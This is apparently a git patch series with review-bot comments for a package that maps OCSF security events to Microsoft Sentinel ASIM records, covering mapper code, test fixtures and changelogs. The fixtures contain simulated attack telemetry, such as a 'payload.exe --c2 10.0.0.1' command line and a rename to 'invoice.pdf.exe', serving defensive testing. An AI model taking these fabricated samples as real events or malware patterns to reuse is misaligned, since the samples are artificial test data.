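Review bot: In the rename branch, `asim.TargetFileName = file_result.name? else asim.TargetFileName` falls back to the *source* file's name, so a `file_result` that carries only `path` produces a TargetFileName that contradicts TargetFilePath — the non-rename line above derives the name from the path instead. `asim.TargetFileName = file_result.name? else file_result.path?.split("\\")[-1] else asim.TargetFileName` keeps the two columns consistent. The rename fixture added to direct-targets.tql supplies both `path` and `name`, so this case is not covered by the tests. The file-event arm begins before the hunk.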
@@ -254,10 +302,15 @@ match class_uid {
 @name = "asim.dns"
 asim.EventSchema = "Dns"
 asim.EventSchemaVersion = "0.1.7"
- asim.EventType = activity_name? else "Query"
- asim.DnsQuery = query?.name? else query?.hostname? else query?.value?
- asim.DnsQueryTypeName = query?.type? else query?.type_name?
- asim.DnsQueryClassName = query?.class? else query?.class_name?
+ asim.EventType = query?.opcode? else "Query"
+ match activity_name {
+ "Query" => { asim.EventSubType = "request" }
+ "Response" => { asim.EventSubType = "response" }
+ _ => {}
+ }
+ asim.DnsQuery = query?.hostname?
+ asim.DnsQueryTypeName = query?.type?
+ asim.DnsQueryClassName = query?.class?
 asim.EventResultDetails = rcode? else "NA"
 asim.SrcIpAddr = src_endpoint?.ip?
 asim.SrcHostname = src_endpoint?.hostname?
@@ -277,16 +330,15 @@ match class_uid {
 }
 asim.SrcHostname = src_endpoint?.hostname? else src_endpoint?.ip?.string()
 asim.SrcIpAddr = src_endpoint?.ip?
- asim.SrcMacAddr = src_endpoint?.mac? else src_endpoint?.mac_addr?
+ asim.SrcMacAddr = src_endpoint?.mac?
 assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
 }
- 0 | 1002 | 1003 | 1004 | 1005 | 1009 | 1010 | 2001 | 2002 | 2005 | 2006 | 2007 | 2008 | 3005 | 4005 | 4006 | 4007 | 4008 | 4009 | 4010 | 4011 | 4012 | 4013 | 4014 | 5001 | 5002 | 5003 | 5004 | 5006 | 5007 | 5008 | 5009 | 5010 | 5011 | 5012 | 5013 | 5014 | 5015 | 5016 | 5017 | 5018 | 5019 | 5020 | 5021 | 5022 | 5023 | 5040 | 6001 | 6002 | 6003 | 6004 | 6005 | 6006 | 6007 | 6008 | 7001 | 7002 | 7003 | 7004 | 8001 | 8002 => {
- microsoft::ocsf::asim::unsupported
- }
 _ => {
 microsoft::ocsf::asim::unsupported
 }
 }
+asim.AdditionalFields = {...this}
+drop asim.AdditionalFields.asim
 this = asim
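Review bot: `asim.EventType = query?.opcode? else "Query"` passes the OCSF opcode label through unvetted, so any opcode other than `Query` (OCSF also defines labels such as `Update` and `Notify`) lands in EventType as-is, whereas the verdict and logon_type changes in this same commit normalize enumerated values through explicit matches. If the ASIM Dns schema admits only a fixed EventType set, an explicit `match query?.opcode?` with an `_ => { asim.EventType = "Query" }` fallback, keeping the raw opcode in a separate original-value field, would match the rest of the mapper. The DNS arm continues past the hunk.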
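Review bot: `asim.AdditionalFields = {...this}` embeds the complete source event, so fields that the mapper already projects into dedicated ASIM columns (`process.cmd_line` → TargetProcessCommandLine, `query.hostname` → DnsQuery, `http_request.url.url_string` → Url) and the `raw_data` that the removed common.tql envelope also carried are now stored twice per record; the most sensitive content of the event is thereby duplicated, and retention or access rules applied to AdditionalFields need to account for that. A comment above the spread, `// AdditionalFields carries the entire OCSF event, including raw_data and command lines already mapped above`, would make the trade-off visible to the next maintainer. In non-strict mode the `_ => { microsoft::ocsf::asim::unsupported }` arm also reaches this spread and `this = asim`; what `asim` holds on that path is not visible here and is worth a sentence in the operator description.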
diff --git a/microsoft/tests/ocsf-to-asim/alert.tql b/microsoft/tests/ocsf-to-asim/alert.tql index 81c83a0..5a96c99 100644 --- a/microsoft/tests/ocsf-to-asim/alert.tql +++ b/microsoft/tests/ocsf-to-asim/alert.tql @@ -55,5 +55,6 @@ microsoft::ocsf::map_to_asim name = @name select name, EventSchema, EventSchemaVersion, EventType, EventUid, EventSeverity, EventOriginalUid, EventProduct, EventVendor, AlertName, - EventSubType, ThreatName, ThreatCategory, AlertStatus, + EventSubType, ThreatName, ThreatCategory, + ThreatOriginalCategory=ThreatOriginalCategory?, AlertStatus, AlertOriginalStatus, AlertVerdict diff --git a/microsoft/tests/ocsf-to-asim/alert.txt b/microsoft/tests/ocsf-to-asim/alert.txt index c8358c3..118437f 100644 --- a/microsoft/tests/ocsf-to-asim/alert.txt +++ b/microsoft/tests/ocsf-to-asim/alert.txt @@ -11,7 +11,8 @@ AlertName: "Suspicious PowerShell", EventSubType: "Threat", ThreatName: "Trojan", - ThreatCategory: "malware", + ThreatCategory: "Malware", + ThreatOriginalCategory: "malware", AlertStatus: "Active", AlertOriginalStatus: "New", AlertVerdict: "True Positive", diff --git a/microsoft/tests/ocsf-to-asim/authentication.tql b/microsoft/tests/ocsf-to-asim/authentication.tql index e0cfa9f..2e0d03b 100644 --- a/microsoft/tests/ocsf-to-asim/authentication.tql +++ b/microsoft/tests/ocsf-to-asim/authentication.tql @@ -13,6 +13,8 @@ from { status_id: 1, status: "Success", auth_protocol: "Kerberos", + logon_type: "Network", + logon_type_id: 3, metadata: { event_code: "4624", original_event_uid: "98761", 
@@ -107,14 +109,48 @@ from { factor_type_id: 5, }, ], +}, { + activity_id: 2, + activity_name: "Logoff", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3002, + class_name: "Authentication", + type_uid: 300202, + type_name: "Authentication: Logoff", + time: 2024-03-23T12:45:00Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + metadata: { + event_code: "4634", + original_event_uid: "98762", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: ["host"], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, } @name = "ocsf.authentication" microsoft::ocsf::map_to_asim name = @name sort EventOriginalUid -select name, EventSchema, EventSchemaVersion, EventType, EventResult, - EventSeverity, EventProduct, EventVendor, EventOriginalType, - EventOriginalUid, Dvc, DvcHostname=DvcHostname?, SrcIpAddr, SrcPortNumber, +select name, EventSchema, EventSchemaVersion, EventType, + EventSubType=EventSubType?, EventOriginalSubType=EventOriginalSubType?, + EventResult, EventSeverity, EventProduct, EventVendor, EventOriginalType, + EventOriginalUid, Dvc, DvcHostname=DvcHostname?, + SrcIpAddr=SrcIpAddr?, SrcPortNumber=SrcPortNumber?, TargetUsername, TargetUsernameType, TargetUserId, TargetUserIdType, TargetAppName=TargetAppName?, TargetAppId=TargetAppId?, LogonProtocol=LogonProtocol?, LogonMethod=LogonMethod? diff --git a/microsoft/tests/ocsf-to-asim/authentication.txt b/microsoft/tests/ocsf-to-asim/authentication.txt index 65c3ba5..7e37af7 100644 --- a/microsoft/tests/ocsf-to-asim/authentication.txt +++ b/microsoft/tests/ocsf-to-asim/authentication.txt 
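Review bot: The new Logoff fixture carries no `logon_type`, so it only exercises the null-subtype path; nothing in this file reaches the `_ => {}` arm of the mapper's `match logon_type?`, which is where an OCSF value outside the mapped set (for example `Batch`, `logon_type_id: 4`) would leave EventSubType unset while EventOriginalSubType is populated. One more event with `logon_type: "Batch"` and `logon_type_id: 4`, paired with an expected row of `EventSubType: null, EventOriginalSubType: "Batch"`, would pin that contract before a producer depends on it.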
@@ -3,6 +3,8 @@ EventSchema: "Authentication", EventSchemaVersion: "0.1.4", EventType: "Logon", + EventSubType: "Remote", + EventOriginalSubType: "Network", EventResult: "Success", EventSeverity: "Informational", EventProduct: "Microsoft-Windows-Security-Auditing", @@ -22,11 +24,39 @@ LogonProtocol: "Kerberos", LogonMethod: null, } +{ + name: "asim.authentication", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logoff", + EventSubType: null, + EventOriginalSubType: null, + EventResult: "Success", + EventSeverity: "Informational", + EventProduct: "Microsoft-Windows-Security-Auditing", + EventVendor: "Microsoft", + EventOriginalType: "4634", + EventOriginalUid: "98762", + Dvc: "DC01.corp.local", + DvcHostname: "DC01.corp.local", + SrcIpAddr: null, + SrcPortNumber: null, + TargetUsername: "CORP\\jdoe", + TargetUsernameType: "Windows", + TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", + TargetUserIdType: "SID", + TargetAppName: null, + TargetAppId: null, + LogonProtocol: null, + LogonMethod: null, +} { name: "asim.authentication", EventSchema: "Authentication", EventSchemaVersion: "0.1.4", EventType: "Logon", + EventSubType: null, + EventOriginalSubType: null, EventResult: "Success", EventSeverity: "Informational", EventProduct: "Microsoft Entra ID", diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.tql b/microsoft/tests/ocsf-to-asim/direct-targets.tql index e616aef..21ca2fa 100644 --- a/microsoft/tests/ocsf-to-asim/direct-targets.tql +++ b/microsoft/tests/ocsf-to-asim/direct-targets.tql 
@@ -28,6 +28,40 @@ from { path: "C:\\tmp\\payload.exe", name: "payload.exe", }, +}, { + activity_id: 5, + activity_name: "Rename", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100105, + time: 2026-01-01T00:00:05Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-2", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + file_result: { + path: "C:\\tmp\\invoice.pdf.exe", + name: "invoice.pdf.exe", + }, }, { activity_id: 6, activity_name: "Traffic", @@ -84,7 +118,7 @@ from { hostname: "dns1", }, query: { - name: "example.org", + hostname: "example.org", type: "A", class: "IN", }, @@ -115,7 +149,7 @@ from { src_endpoint: { hostname: "client1", ip: 10.0.0.50, - mac_addr: "00:11:22:33:44:55", + mac: "00:11:22:33:44:55", }, }, { activity_id: 3, @@ -138,11 +172,11 @@ from { device: { hostname: "proxy1", }, - url: { - url_string: "https://example.org/index.html", - }, http_request: { http_method: "GET", + url: { + url_string: "https://example.org/index.html", + }, }, http_response: { code: 200, @@ -154,7 +188,8 @@ sort EventOriginalUid select name, EventSchema, EventSchemaVersion, EventType, EventResult, EventSeverity, EventOriginalUid, Dvc, ActorUsername=ActorUsername?, TargetFilePath=TargetFilePath?, TargetFilePathType=TargetFilePathType?, - TargetFileName=TargetFileName?, SrcIpAddr=SrcIpAddr?, + TargetFileName=TargetFileName?, SrcFilePath=SrcFilePath?, + SrcFileName=SrcFileName?, SrcIpAddr=SrcIpAddr?, SrcPortNumber=SrcPortNumber?, DstIpAddr=DstIpAddr?, DstPortNumber=DstPortNumber?, SrcBytes=SrcBytes?, DstBytes=DstBytes?, DnsQuery=DnsQuery?, DnsQueryTypeName=DnsQueryTypeName?, 
diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.txt b/microsoft/tests/ocsf-to-asim/direct-targets.txt index cf0e400..89b0c39 100644 --- a/microsoft/tests/ocsf-to-asim/direct-targets.txt +++ b/microsoft/tests/ocsf-to-asim/direct-targets.txt @@ -11,6 +11,8 @@ TargetFilePath: null, TargetFilePathType: null, TargetFileName: null, + SrcFilePath: null, + SrcFileName: null, SrcIpAddr: 10.0.0.50, SrcPortNumber: null, DstIpAddr: null, @@ -39,6 +41,8 @@ TargetFilePath: null, TargetFilePathType: null, TargetFileName: null, + SrcFilePath: null, + SrcFileName: null, SrcIpAddr: 10.0.0.1, SrcPortNumber: null, DstIpAddr: null, @@ -67,6 +71,38 @@ TargetFilePath: "C:\\tmp\\payload.exe", TargetFilePathType: "Windows Local", TargetFileName: "payload.exe", + SrcFilePath: null, + SrcFileName: null, + SrcIpAddr: null, + SrcPortNumber: null, + DstIpAddr: null, + DstPortNumber: null, + SrcBytes: null, + DstBytes: null, + DnsQuery: null, + DnsQueryTypeName: null, + DnsQueryClassName: null, + EventResultDetails: null, + SrcHostname: null, + SrcMacAddr: null, + Url: null, + HttpRequestMethod: null, +} +{ + name: "asim.file_event", + EventSchema: "FileEvent", + EventSchemaVersion: "0.2.2", + EventType: "FileRenamed", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalUid: "file-2", + Dvc: "host1", + ActorUsername: "alice", + TargetFilePath: "C:\\tmp\\invoice.pdf.exe", + TargetFilePathType: "Windows Local", + TargetFileName: "invoice.pdf.exe", + SrcFilePath: "C:\\tmp\\payload.exe", + SrcFileName: "payload.exe", SrcIpAddr: null, SrcPortNumber: null, DstIpAddr: null, @@ -95,6 +131,8 @@ TargetFilePath: null, TargetFilePathType: null, TargetFileName: null, + SrcFilePath: null, + SrcFileName: null, SrcIpAddr: 10.0.0.1, SrcPortNumber: 12345, DstIpAddr: 10.0.0.2, @@ -123,6 +161,8 @@ TargetFilePath: null, TargetFilePathType: null, TargetFileName: null, + SrcFilePath: null, + SrcFileName: null, SrcIpAddr: null, SrcPortNumber: null, DstIpAddr: null, 
diff --git a/microsoft/tests/ocsf-to-asim/process.tql b/microsoft/tests/ocsf-to-asim/process.tql index a70ec48..db7a522 100644 --- a/microsoft/tests/ocsf-to-asim/process.tql +++ b/microsoft/tests/ocsf-to-asim/process.tql @@ -26,6 +26,14 @@ from { hostname: "WINHOST01.corp.local", }, actor: { + process: { + pid: 4660, + name: "wscript.exe", + parent_process: { + pid: 520, + name: "explorer.exe", + }, + }, session: { uid_alt: "0xA1B2C3", }, diff --git a/microsoft/tests/ocsf-to-asim/process.txt b/microsoft/tests/ocsf-to-asim/process.txt index 299bbb6..ffe7db0 100644 --- a/microsoft/tests/ocsf-to-asim/process.txt +++ b/microsoft/tests/ocsf-to-asim/process.txt @@ -12,7 +12,7 @@ ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", ActorUserIdType: "SID", ActingProcessId: "4660", - ParentProcessId: "4660", + ParentProcessId: "520", TargetProcessId: "6732", TargetProcessName: "payload.exe", TargetProcessCommandLine: "payload.exe --c2 10.0.0.1", From e47c55796036eb16e3fe76741b89ecdb877db7ef Mon Sep 17 00:00:00 2001 
From: Matthias Vallentin Date: Mon, 8 Jun 2026 08:14:52 +0200 Subject: [PATCH 03/27] Add canonical Microsoft mapping entry points Expose microsoft::ocsf::map and microsoft::asim::map as the broad package entry points. Split the OCSF-to-ASIM implementation into class-level mappers under microsoft::asim::ocsf so future direct ASIM mappings can be added behind the stable API. Assisted-by: GPT-5 (Codex) --- ...ell-audit-log-cleared-and-iam-lifecycle.md | 2 +- ...crosoft-graph-sources-and-ocsf-mappings.md | 2 +- .../unreleased/ocsf-to-asim-mapper.md | 6 +- .../windows-authorize-session-ocsf-mapping.md | 2 +- .../graph-defender-alerts-to-ocsf.tql | 2 +- .../graph-defender-incidents-to-ocsf.tql | 2 +- .../graph-directory-audits-to-ocsf.tql | 2 +- .../graph-intune-compliance-to-ocsf.tql | 2 +- .../graph-intune-detected-apps-to-ocsf.tql | 2 +- .../graph-intune-managed-devices-to-ocsf.tql | 2 +- .../graph-risk-detections-to-ocsf.tql | 2 +- .../examples/graph-risky-users-to-ocsf.tql | 2 +- microsoft/examples/graph-sign-ins-to-ocsf.tql | 2 +- microsoft/operators/asim/map.tql | 22 ++ .../operators/asim/ocsf/account_change.tql | 46 +++ .../operators/asim/ocsf/authentication.tql | 58 +++ .../operators/asim/ocsf/authorize_session.tql | 55 +++ .../asim/ocsf/compliance_finding.tql | 41 +++ .../operators/asim/ocsf/detection_finding.tql | 56 +++ .../operators/asim/ocsf/dhcp_activity.tql | 22 ++ .../operators/asim/ocsf/dns_activity.tql | 26 ++ .../operators/asim/ocsf/entity_management.tql | 40 ++ .../asim/ocsf/event_log_activity.tql | 40 ++ .../asim/ocsf/file_system_activity.tql | 37 ++ .../operators/asim/ocsf/group_management.tql | 42 +++ .../asim => asim/ocsf/helpers}/common.tql | 0 .../operators/asim/ocsf/helpers/finalize.tql | 7 + .../ocsf/helpers}/unsupported.tql | 2 +- .../operators/asim/ocsf/http_activity.tql | 19 + microsoft/operators/asim/ocsf/map.tql | 57 +++ .../operators/asim/ocsf/network_activity.tql | 33 ++ .../operators/asim/ocsf/process_activity.tql | 31 ++ 
.../asim/ocsf/scheduled_job_activity.tql | 40 ++ .../asim/ocsf/windows_service_activity.tql | 40 ++ microsoft/operators/ocsf/map.tql | 15 + microsoft/operators/ocsf/map_to_asim.tql | 344 ------------------ microsoft/package.yaml | 4 +- microsoft/tests/asim/graph.tql | 11 + microsoft/tests/asim/graph.txt | 16 + microsoft/tests/asim/ocsf.tql | 39 ++ microsoft/tests/asim/ocsf.txt | 18 + microsoft/tests/asim/windows.tql | 10 + microsoft/tests/asim/windows.txt | 19 + ...pliance-policy-setting-state-summaries.tql | 2 +- .../tests/graph/ocsf/defender-alerts.tql | 2 +- .../tests/graph/ocsf/defender-incidents.tql | 2 +- microsoft/tests/graph/ocsf/detected-apps.tql | 2 +- .../tests/graph/ocsf/directory-audits.tql | 2 +- .../tests/graph/ocsf/managed-devices.tql | 2 +- .../tests/graph/ocsf/risk-detections.tql | 2 +- microsoft/tests/graph/ocsf/risky-users.tql | 2 +- microsoft/tests/graph/ocsf/sign-ins.tql | 2 +- microsoft/tests/ocsf-to-asim/alert.tql | 2 +- microsoft/tests/ocsf-to-asim/audit.tql | 2 +- .../tests/ocsf-to-asim/authentication.tql | 2 +- .../tests/ocsf-to-asim/direct-targets.tql | 2 +- microsoft/tests/ocsf-to-asim/process.tql | 2 +- .../tests/ocsf-to-asim/unsupported-strict.tql | 2 +- .../tests/ocsf-to-asim/user-management.tql | 2 +- microsoft/tests/ocsf/eid-0100.tql | 2 +- microsoft/tests/ocsf/eid-0101.tql | 2 +- microsoft/tests/ocsf/eid-0102.tql | 2 +- microsoft/tests/ocsf/eid-0106.tql | 2 +- microsoft/tests/ocsf/eid-0129.tql | 2 +- microsoft/tests/ocsf/eid-0140.tql | 2 +- microsoft/tests/ocsf/eid-0141.tql | 2 +- microsoft/tests/ocsf/eid-0200.tql | 2 +- microsoft/tests/ocsf/eid-0201.tql | 2 +- microsoft/tests/ocsf/eid-1000.tql | 2 +- microsoft/tests/ocsf/eid-1001.tql | 2 +- microsoft/tests/ocsf/eid-1002.tql | 2 +- microsoft/tests/ocsf/eid-1006.tql | 2 +- microsoft/tests/ocsf/eid-1007.tql | 2 +- microsoft/tests/ocsf/eid-1102.tql | 2 +- microsoft/tests/ocsf/eid-1116.tql | 2 +- microsoft/tests/ocsf/eid-1117.tql | 2 +- microsoft/tests/ocsf/eid-1121.tql | 2 +- 
microsoft/tests/ocsf/eid-2000.tql | 2 +- microsoft/tests/ocsf/eid-4100.tql | 2 +- microsoft/tests/ocsf/eid-4103.tql | 2 +- microsoft/tests/ocsf/eid-4104.tql | 2 +- microsoft/tests/ocsf/eid-4105.tql | 2 +- microsoft/tests/ocsf/eid-4106.tql | 2 +- microsoft/tests/ocsf/eid-4624.tql | 2 +- microsoft/tests/ocsf/eid-4625.tql | 2 +- microsoft/tests/ocsf/eid-4648.tql | 2 +- microsoft/tests/ocsf/eid-4672.tql | 2 +- microsoft/tests/ocsf/eid-4688.tql | 2 +- microsoft/tests/ocsf/eid-4697.tql | 2 +- microsoft/tests/ocsf/eid-4698.tql | 2 +- microsoft/tests/ocsf/eid-4720.tql | 2 +- microsoft/tests/ocsf/eid-4722.tql | 2 +- microsoft/tests/ocsf/eid-4725.tql | 2 +- microsoft/tests/ocsf/eid-4726.tql | 2 +- microsoft/tests/ocsf/eid-4728.tql | 2 +- microsoft/tests/ocsf/eid-4730.tql | 2 +- microsoft/tests/ocsf/eid-4732.tql | 2 +- microsoft/tests/ocsf/eid-4769.tql | 2 +- microsoft/tests/ocsf/eid-4771.tql | 2 +- microsoft/tests/ocsf/eid-4776.tql | 2 +- microsoft/tests/ocsf/eid-5001.tql | 2 +- microsoft/tests/ocsf/eid-5007.tql | 2 +- microsoft/tests/ocsf/eid-6005.tql | 2 +- microsoft/tests/ocsf/eid-6006.tql | 2 +- microsoft/tests/ocsf/eid-7034.tql | 2 +- microsoft/tests/ocsf/eid-7045.tql | 2 +- microsoft/tests/ocsf/eid-9999.tql | 2 +- 107 files changed, 923 insertions(+), 425 deletions(-) create mode 100644 microsoft/operators/asim/map.tql create mode 100644 microsoft/operators/asim/ocsf/account_change.tql create mode 100644 microsoft/operators/asim/ocsf/authentication.tql create mode 100644 microsoft/operators/asim/ocsf/authorize_session.tql create mode 100644 microsoft/operators/asim/ocsf/compliance_finding.tql create mode 100644 microsoft/operators/asim/ocsf/detection_finding.tql create mode 100644 microsoft/operators/asim/ocsf/dhcp_activity.tql create mode 100644 microsoft/operators/asim/ocsf/dns_activity.tql create mode 100644 microsoft/operators/asim/ocsf/entity_management.tql create mode 100644 microsoft/operators/asim/ocsf/event_log_activity.tql create mode 100644 
microsoft/operators/asim/ocsf/file_system_activity.tql create mode 100644 microsoft/operators/asim/ocsf/group_management.tql rename microsoft/operators/{ocsf/asim => asim/ocsf/helpers}/common.tql (100%) create mode 100644 microsoft/operators/asim/ocsf/helpers/finalize.tql rename microsoft/operators/{ocsf/asim => asim/ocsf/helpers}/unsupported.tql (73%) create mode 100644 microsoft/operators/asim/ocsf/http_activity.tql create mode 100644 microsoft/operators/asim/ocsf/map.tql create mode 100644 microsoft/operators/asim/ocsf/network_activity.tql create mode 100644 microsoft/operators/asim/ocsf/process_activity.tql create mode 100644 microsoft/operators/asim/ocsf/scheduled_job_activity.tql create mode 100644 microsoft/operators/asim/ocsf/windows_service_activity.tql create mode 100644 microsoft/operators/ocsf/map.tql delete mode 100644 microsoft/operators/ocsf/map_to_asim.tql create mode 100644 microsoft/tests/asim/graph.tql create mode 100644 microsoft/tests/asim/graph.txt create mode 100644 microsoft/tests/asim/ocsf.tql create mode 100644 microsoft/tests/asim/ocsf.txt create mode 100644 microsoft/tests/asim/windows.tql create mode 100644 microsoft/tests/asim/windows.txt diff --git a/microsoft/changelog/unreleased/expanded-windows-event-log-ocsf-mapping-powershell-audit-log-cleared-and-iam-lifecycle.md b/microsoft/changelog/unreleased/expanded-windows-event-log-ocsf-mapping-powershell-audit-log-cleared-and-iam-lifecycle.md index c7a339b..ddcecf9 100644 --- a/microsoft/changelog/unreleased/expanded-windows-event-log-ocsf-mapping-powershell-audit-log-cleared-and-iam-lifecycle.md +++ b/microsoft/changelog/unreleased/expanded-windows-event-log-ocsf-mapping-powershell-audit-log-cleared-and-iam-lifecycle.md 
@@ -11,7 +11,7 @@ prs: created: 2026-03-24T13:37:04.933237Z --- -The `microsoft::windows::ocsf::map` operator now covers five additional Windows Event Log categories: +The `microsoft::ocsf::map` operator now covers five additional Windows Event Log categories: **PowerShell logging** (EIDs 4100/4103/4104/4105/4106) maps to OCSF Script Activity (1009). EID 4104 (Script Block Logging) sets `severity_id` to Low when AMSI flags the block; EID 4100 (engine error) marks the execution as a failure. diff --git a/microsoft/changelog/unreleased/microsoft-graph-sources-and-ocsf-mappings.md b/microsoft/changelog/unreleased/microsoft-graph-sources-and-ocsf-mappings.md index efb2294..4ccc175 100644 --- a/microsoft/changelog/unreleased/microsoft-graph-sources-and-ocsf-mappings.md +++ b/microsoft/changelog/unreleased/microsoft-graph-sources-and-ocsf-mappings.md @@ -12,7 +12,7 @@ created: 2026-05-27T09:17:24Z The Microsoft package can now collect and normalize common Microsoft Graph security and inventory data. -Use the Graph source operators and `microsoft::graph::ocsf::map` for Entra ID +Use the Graph source operators and `microsoft::ocsf::map` for Entra ID sign-ins, directory audits, Defender alerts and incidents, Identity Protection risk data, and Intune inventory and compliance data. diff --git a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md index 8655ed3..f0b462d 100644 --- a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md +++ b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md 
@@ -7,8 +7,10 @@ authors: created: 2026-06-07T00:00:00Z --- -The Microsoft package now includes `microsoft::ocsf::map_to_asim` to convert -validated OCSF 1.8 events into flat Microsoft Sentinel ASIM event records. +The Microsoft package now includes `microsoft::asim::map` to convert supported +Microsoft events into flat Microsoft Sentinel ASIM event records. The mapper +uses the new `microsoft::ocsf::map` entry point and `microsoft::asim::ocsf::map` +for validated OCSF 1.8 events. The mapper covers the Microsoft package's current OCSF authentication, process, audit, user-management, and alert outputs, plus direct OCSF counterparts for diff --git a/microsoft/changelog/unreleased/windows-authorize-session-ocsf-mapping.md b/microsoft/changelog/unreleased/windows-authorize-session-ocsf-mapping.md index 930d623..ee209f3 100644 --- a/microsoft/changelog/unreleased/windows-authorize-session-ocsf-mapping.md +++ b/microsoft/changelog/unreleased/windows-authorize-session-ocsf-mapping.md @@ -9,4 +9,4 @@ prs: created: 2026-06-02T08:30:07.026165Z --- -The `microsoft::windows::ocsf::map` operator now maps Windows Security Event ID 4672, "Special privileges assigned to new logon", to OCSF Authorize Session (3003) with the Assign Privileges activity. +The `microsoft::ocsf::map` operator now maps Windows Security Event ID 4672, "Special privileges assigned to new logon", to OCSF Authorize Session (3003) with the Assign Privileges activity. diff --git a/microsoft/examples/graph-defender-alerts-to-ocsf.tql b/microsoft/examples/graph-defender-alerts-to-ocsf.tql index 11adff0..ae2bd8f 100644 --- a/microsoft/examples/graph-defender-alerts-to-ocsf.tql +++ b/microsoft/examples/graph-defender-alerts-to-ocsf.tql @@ -8,6 +8,6 @@ microsoft::graph::defender::alerts \ client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET"), lookback=5m -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast 
diff --git a/microsoft/examples/graph-defender-incidents-to-ocsf.tql b/microsoft/examples/graph-defender-incidents-to-ocsf.tql
index 08943f3..862f44c 100644
--- a/microsoft/examples/graph-defender-incidents-to-ocsf.tql
+++ b/microsoft/examples/graph-defender-incidents-to-ocsf.tql
@@ -9,7 +9,7 @@ every 5m {
 client_secret=secret("CLIENT_SECRET"),
 lookback=5m
 }
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-directory-audits-to-ocsf.tql b/microsoft/examples/graph-directory-audits-to-ocsf.tql
index 6f36800..cf3498e 100644
--- a/microsoft/examples/graph-directory-audits-to-ocsf.tql
+++ b/microsoft/examples/graph-directory-audits-to-ocsf.tql
@@ -9,7 +9,7 @@ every 5m {
 client_secret=secret("CLIENT_SECRET"),
 lookback=5m
 }
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-intune-compliance-to-ocsf.tql b/microsoft/examples/graph-intune-compliance-to-ocsf.tql
index 37c2309..de4b6b2 100644
--- a/microsoft/examples/graph-intune-compliance-to-ocsf.tql
+++ b/microsoft/examples/graph-intune-compliance-to-ocsf.tql
@@ -8,7 +8,7 @@ every 5m {
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
 }
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql
index e02193d..3277563 100644
--- a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql
+++ b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql
@@ -8,7 +8,7 @@ every 5m {
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
 }
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql
index 4896624..4e0ef7f 100644
--- a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql
+++ b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql
@@ -7,6 +7,6 @@ microsoft::graph::intune::managed_devices \
 tenant_id="TENANT_ID",
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/examples/graph-risk-detections-to-ocsf.tql b/microsoft/examples/graph-risk-detections-to-ocsf.tql
index 4a22971..5b59ea1 100644
--- a/microsoft/examples/graph-risk-detections-to-ocsf.tql
+++ b/microsoft/examples/graph-risk-detections-to-ocsf.tql
@@ -8,7 +8,7 @@ every 5m {
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
 }
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-risky-users-to-ocsf.tql b/microsoft/examples/graph-risky-users-to-ocsf.tql
index 09325d0..1c37ffd 100644
--- a/microsoft/examples/graph-risky-users-to-ocsf.tql
+++ b/microsoft/examples/graph-risky-users-to-ocsf.tql
@@ -8,7 +8,7 @@ every 5m {
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
 }
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-sign-ins-to-ocsf.tql b/microsoft/examples/graph-sign-ins-to-ocsf.tql
index a751311..7a1031a 100644
--- a/microsoft/examples/graph-sign-ins-to-ocsf.tql
+++ b/microsoft/examples/graph-sign-ins-to-ocsf.tql
@@ -8,6 +8,6 @@ microsoft::graph::sign_ins \
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET"),
 lookback=5m
-microsoft::graph::ocsf::map
+microsoft::ocsf::map
